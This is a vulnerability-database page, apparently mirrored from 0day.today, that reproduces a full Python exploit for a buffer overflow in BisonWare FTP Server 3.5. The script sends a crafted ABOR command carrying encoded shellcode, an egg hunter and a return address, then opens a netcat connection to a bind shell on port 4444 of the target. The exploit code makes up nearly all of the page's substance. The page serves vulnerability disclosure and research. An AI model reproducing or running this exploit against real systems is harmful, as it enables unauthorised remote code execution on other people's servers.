Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BisonWare FTP Server 3.5 Buffer Overflow Exploit

🗓️ 15 May 2015 00:00:00Reported by Bikash DashType 
zdt
 zdt🔗 0day.today👁 23 Views

BisonWare FTP Server 3.5 Buffer Overflow Exploit, vulnerability found in version 3.5 of BisonWare FTP Server allowing attackers to execute arbitrary code

Code
#!/usr/bin/python
# Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits
# Date: 22 April,2015
# Exploit Author: Bikash Dash
# www.vulnerableghost.com
# Version: BisonWare FTP Server Version 3.5
# Tested on: Windows XP service pack3
# CVE : [N/A]
import socket, sys, os, time
print "\n================================ "
print " -----Vulnerable Gh0st------------ "
print "       Bikash Dash(0xfb**)          "
print "   Bikash Dash, Chanchal Rastogi,manish Tanwar,Aditya Upadhaya    "
print "  www.vulnerableghost.com "
print "=================================\n"
if len(sys.argv) != 3:
    print "[*] Usage:  %s  <target> <port> \n" % sys.argv[0]
    sys.exit(0)
target = sys.argv[1] #User Passed Argument 1
port = int(sys.argv[2]) #User Passed Argument 2
shellcode = ("w00tw00t" + "\xbd\xa9\x85\x2d\x7f\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xa6\x67\xd8\x83\x50\xee"
"\x23\x7c\xa0\x91\xaa\x99\x91\x83\xc9\xea\x83\x13\x99\xbf\x2f"
"\xdf\xcf\x2b\xa4\xad\xc7\x5c\x0d\x1b\x3e\x52\x8e\xad\xfe\x38"
"\x4c\xaf\x82\x42\x80\x0f\xba\x8c\xd5\x4e\xfb\xf1\x15\x02\x54"
"\x7d\x87\xb3\xd1\xc3\x1b\xb5\x35\x48\x23\xcd\x30\x8f\xd7\x67"
"\x3a\xc0\x47\xf3\x74\xf8\xec\x5b\xa5\xf9\x21\xb8\x99\xb0\x4e"
"\x0b\x69\x43\x86\x45\x92\x75\xe6\x0a\xad\xb9\xeb\x53\xe9\x7e"
"\x13\x26\x01\x7d\xae\x31\xd2\xff\x74\xb7\xc7\x58\xff\x6f\x2c"
"\x58\x2c\xe9\xa7\x56\x99\x7d\xef\x7a\x1c\x51\x9b\x87\x95\x54"
"\x4c\x0e\xed\x72\x48\x4a\xb6\x1b\xc9\x36\x19\x23\x09\x9e\xc6"
"\x81\x41\x0d\x13\xb3\x0b\x5a\xd0\x8e\xb3\x9a\x7e\x98\xc0\xa8"
"\x21\x32\x4f\x81\xaa\x9c\x88\xe6\x81\x59\x06\x19\x29\x9a\x0e"
"\xde\x7d\xca\x38\xf7\xfd\x81\xb8\xf8\x28\x05\xe9\x56\x82\xe6"
"\x59\x17\x72\x8f\xb3\x98\xad\xaf\xbb\x72\xd8\xf7\x75\xa6\x89"
"\x9f\x77\x58\x3c\x3c\xf1\xbe\x54\xac\x57\x68\xc0\x0e\x8c\xa1"
"\x77\x70\xe6\x9d\x20\xe6\xbe\xcb\xf6\x09\x3f\xde\x55\xa5\x97"
"\x89\x2d\xa5\x23\xab\x32\xe0\x03\xa2\x0b\x63\xd9\xda\xde\x15"
"\xde\xf6\x88\xb6\x4d\x9d\x48\xb0\x6d\x0a\x1f\x95\x40\x43\xf5"
"\x0b\xfa\xfd\xeb\xd1\x9a\xc6\xaf\x0d\x5f\xc8\x2e\xc3\xdb\xee"
"\x20\x1d\xe3\xaa\x14\xf1\xb2\x64\xc2\xb7\x6c\xc7\xbc\x61\xc2"
"\x81\x28\xf7\x28\x12\x2e\xf8\x64\xe4\xce\x49\xd1\xb1\xf1\x66"
"\xb5\x35\x8a\x9a\x25\xb9\x41\x1f\x55\xf0\xcb\x36\xfe\x5d\x9e"
"\x0a\x63\x5e\x75\x48\x9a\xdd\x7f\x31\x59\xfd\x0a\x34\x25\xb9"
"\xe7\x44\x36\x2c\x07\xfa\x37\x65") #Payload prefixed with w00tw00t tag
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 bytes egg hunter NtDisplayString
buffer = "\x90"*(1063 - (len(shellcode)+len(egghunter))) #Align the stack
ebx = "\x71\x87\xA1\x7C" #JMP EBX 7CA18771from Shell32.dll
nopsled = "\x90"*205 #205 NOP Sled
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
    s.connect((target,port)) #Connect to BisonWare FTP Server
    s.recv(1024) #Receive 1024 bytes from BisonWare FTP Server
    time.sleep(3) #Wait for 3 seconds before executing next statement
    print "[+] Sending payload"
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('USER anonymous\r\n') #Send FTP command 'USER anonymous'
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('PASS anonymous\r\n') #Send FTP command 'PASS anonymous'
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('ABOR ' + shellcode + buffer + egghunter + ebx + nopsled +'\r\n') #Send FTP command 'ABOR '
    s.close() #Close the socket
    print "[+] Exploit Sent Successfully"
    print "[+] Waiting for 5 sec before spawning shell to " + target + ":4444 \r"
    print "\r"
    time.sleep(5) #Wait for 5 seconds before connection to Bind Shell
    os.system("nc -n " + target + " 4444") #Connect to Bind Shell using netcat
    print "[-] Connection lost from " + target + ":4444 \r"
except:
    print "[-] Could not connect to " + target + ":21\r"
    sys.exit(0) #Exit the Exploit POC code execution

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 May 2015 00:00Current
7.5High risk
Vulners AI Score7.5
bisonware ftp serverbuffer overflowexploitarbitrary codevulnerabilitywindows xpegg huntingbikash dashvulnerable ghostshellcodeexploit authorvulnerability discovery
23